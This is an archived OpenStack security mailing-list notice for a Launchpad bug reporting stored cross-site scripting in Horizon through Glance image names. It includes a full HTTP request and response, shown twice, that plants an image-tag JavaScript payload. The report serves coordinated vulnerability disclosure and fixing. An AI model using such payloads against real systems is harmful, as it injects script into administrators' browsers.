[Openstack-security] [Bug 1623735] Re: Stored XSS in Glance Image Names

Jeremy Stanley fungi at yuggoth.org
Fri Sep 16 00:45:11 UTC 2016 

*** This bug is a duplicate of bug 1622690 ***
    https://bugs.launchpad.net/bugs/1622690

** Information type changed from Private Security to Public

** This bug has been marked a duplicate of bug 1622690
   Potential XSS in image create modal or angular table

** Description changed:

- This issue is being treated as a potential security risk under embargo.
- Please do not make any public mention of embargoed (private) security
- vulnerabilities before their coordinated publication by the OpenStack
- Vulnerability Management Team in the form of an official OpenStack
- Security Advisory. This includes discussion of the bug or associated
- fixes in public forums such as mailing lists, code review systems and
- bug trackers. Please also avoid private disclosure to other individuals
- not already approved for access to this information, and provide this
- same reminder to those who are made aware of the issue prior to
- publication. All discussion should remain confined to this private bug
- report, and any proposed fixes should be added to the bug as
- attachments.
- 
- --
- 
  My team is currently testing Glance with the API security testing tool
  we've developed (https://github.com/openstack/syntribos), and in the
  course of testing I discovered a cross-site scripting issue in Horizon
  stemming from Glance image names.
  
  =========================
  
  Request to Glance:
  
  POST /v2/images HTTP/1.1
  Host: [GLANCE ENDPOINT]
  Connection: close
  Accept-Encoding: gzip, deflate
  Accept: application/json
  User-Agent: python-requests/2.11.1
  Content-Type: application/json
  X-Auth-Token: [TOKEN]
  Content-Length: 207
  
  {"protected": false, "name": "<IMG SRC=javascript:alert('XSS')>",
  "tags": ["testing"], "container_format": "bare", "disk_format": "raw",
  "id": "0b8b0e0d-0ed2-4628-b25d-3e8ce239f6de", "visibility": "private"}
  
  HTTP/1.1 201 Created
  Content-Length: 585
  Content-Type: application/json; charset=UTF-8
  Location: http://[GLANCE ENDPOINT]/v2/images/0b8b0e0d-0ed2-4628-b25d-3e8ce239f6de
  X-Openstack-Request-Id: req-e7150b2a-9a52-44a0-bd8d-1663dfc95524
  Date: Thu, 15 Sep 2016 00:26:57 GMT
  Connection: close
  
  {"status": "queued", "name": "<IMG SRC=javascript:alert('XSS')>",
  "tags": ["testing"], "container_format": "bare", "created_at":
  "2016-09-15T00:26:57Z", "size": null, "disk_format": "raw",
  "updated_at": "2016-09-15T00:26:57Z", "visibility": "private", "self":
  "/v2/images/0b8b0e0d-0ed2-4628-b25d-3e8ce239f6de", "min_disk": 0,
  "protected": false, "id": "0b8b0e0d-0ed2-4628-b25d-3e8ce239f6de",
  "file": "/v2/images/0b8b0e0d-0ed2-4628-b25d-3e8ce239f6de/file",
  "checksum": null, "owner": "823c88c894af4aafa0b8f12d2eb8f1be",
  "virtual_size": null, "min_ram": 0, "schema": "/v2/schemas/image"}
  
  =========================
  
  This will percolate into Horizon's list view of Glance images
  (/admin/images), and result in an alert box popping up (see attached
  screenshot).

-- 
You received this bug notification because you are a member of OpenStack
Security, which is subscribed to OpenStack.
https://bugs.launchpad.net/bugs/1623735

Title:
  Stored XSS in Glance Image Names

Status in OpenStack Dashboard (Horizon):
  New
Status in OpenStack Security Advisory:
  Incomplete

Bug description:
  My team is currently testing Glance with the API security testing tool
  we've developed (https://github.com/openstack/syntribos), and in the
  course of testing I discovered a cross-site scripting issue in Horizon
  stemming from Glance image names.

  =========================

  Request to Glance:

  POST /v2/images HTTP/1.1
  Host: [GLANCE ENDPOINT]
  Connection: close
  Accept-Encoding: gzip, deflate
  Accept: application/json
  User-Agent: python-requests/2.11.1
  Content-Type: application/json
  X-Auth-Token: [TOKEN]
  Content-Length: 207

  {"protected": false, "name": "<IMG SRC=javascript:alert('XSS')>",
  "tags": ["testing"], "container_format": "bare", "disk_format": "raw",
  "id": "0b8b0e0d-0ed2-4628-b25d-3e8ce239f6de", "visibility": "private"}

  HTTP/1.1 201 Created
  Content-Length: 585
  Content-Type: application/json; charset=UTF-8
  Location: http://[GLANCE ENDPOINT]/v2/images/0b8b0e0d-0ed2-4628-b25d-3e8ce239f6de
  X-Openstack-Request-Id: req-e7150b2a-9a52-44a0-bd8d-1663dfc95524
  Date: Thu, 15 Sep 2016 00:26:57 GMT
  Connection: close

  {"status": "queued", "name": "<IMG SRC=javascript:alert('XSS')>",
  "tags": ["testing"], "container_format": "bare", "created_at":
  "2016-09-15T00:26:57Z", "size": null, "disk_format": "raw",
  "updated_at": "2016-09-15T00:26:57Z", "visibility": "private", "self":
  "/v2/images/0b8b0e0d-0ed2-4628-b25d-3e8ce239f6de", "min_disk": 0,
  "protected": false, "id": "0b8b0e0d-0ed2-4628-b25d-3e8ce239f6de",
  "file": "/v2/images/0b8b0e0d-0ed2-4628-b25d-3e8ce239f6de/file",
  "checksum": null, "owner": "823c88c894af4aafa0b8f12d2eb8f1be",
  "virtual_size": null, "min_ram": 0, "schema": "/v2/schemas/image"}

  =========================

  This will percolate into Horizon's list view of Glance images
  (/admin/images), and result in an alert box popping up (see attached
  screenshot).

To manage notifications about this bug go to:
https://bugs.launchpad.net/horizon/+bug/1623735/+subscriptions

More information about the Openstack-security mailing list